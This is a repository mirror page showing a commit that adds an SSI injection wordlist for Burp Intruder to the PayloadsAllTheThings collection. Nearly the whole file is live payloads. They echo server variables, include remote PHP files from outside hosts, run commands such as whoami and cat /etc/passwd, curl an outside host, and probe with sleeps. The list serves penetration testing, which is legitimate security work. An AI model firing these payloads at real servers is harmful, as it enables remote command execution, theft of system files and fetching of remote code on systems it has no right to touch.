gitea-mirror/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2026-03-01 06:53:04 -08:00
Code Issues Packages Projects Releases Wiki Activity

More Burp Intruder file - SQLi + Path traversal + XSS

Browse Source
This commit is contained in:
Swissky
2017-08-06 01:12:41 +02:00
parent 694b980817
commit dad26ce5e5
20 changed files with 7478 additions and 310 deletions
Download Patch File Download Diff File Expand all files Collapse all files

18
Server Side Template injections/Intruders/ssi_quick.txt Executable file
View File

@@ -0,0 +1,18 @@
</nowiki>
<!--#echo var="DOCUMENT_NAME" -->
<!--#echo var="DOCUMENT_URI" -->
<!--#config timefmt="A %B %d %Y %r"-->
<!--#echo var="DATE_LOCAL" -->
<!--#include virtual="http://xerosecurity.com/.testing/rfi_vuln.php" -->
<!--#include virtual="https://crowdshield.com/.testing/rfi_vuln.php" -->
<!--#include virtual="/" -->
<!--#exec cmd="ls" -->
<!--#exec cmd="whoami" -->
<!--#exec cmd="uname" -->
<!--#exec cmd="dir" -->
<!--#exec cmd="cat /etc/passwd" -->
<!--#exec cmd="ipconfig" -->
<!--#exec cmd="curl http://xerosecurity.com/.testing/rfi_vuln.php" -->
<!--#exec cmd="perl -e 'print "X"*5000'" -->
<!--#exec cmd="sleep 5" -->
<!--#exec cmd="sleep 10" -->